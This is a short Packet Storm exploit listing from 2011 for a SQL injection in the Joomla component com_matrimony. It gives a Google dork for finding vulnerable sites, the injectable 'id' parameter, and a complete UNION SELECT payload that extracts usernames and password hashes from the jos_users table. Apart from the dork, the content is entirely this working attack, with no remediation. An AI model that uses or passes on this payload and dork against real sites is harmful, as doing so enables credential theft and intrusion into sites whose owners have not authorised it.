Joomla Matrimony SQL Injection

2011-12-20T00:00:00
ID PACKETSTORM:108031
Type packetstorm
Reporter CoBRa_21
Modified 2011-12-20T00:00:00

Description

                                        
                                            `  
  
  
  
  
################################################################################################  
# Exploit Title: Joomla Component (com_matrimony) SQL Injection Vulnerability  
#  
# Author : CoBRa_21   
#  
# E-Mail : uyku_cu [at] windowslive.com  
#  
# Google Dork : inurl:index.php?option=com_matrimony  
#  
# Status : High-Risk  
#  
################################################################################################  
#  
# SQL Vulnerability  
#  
# http://127.0.0.1/[PATH]/index.php?option=com_matrimony&action=view&id=2 (SQL)  
#  
# SQL Exploit  
#  
# +union+select+0,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users  
#  
################################################################################################  
# ( Vulnerability Researcher )   
################################################################################################   
`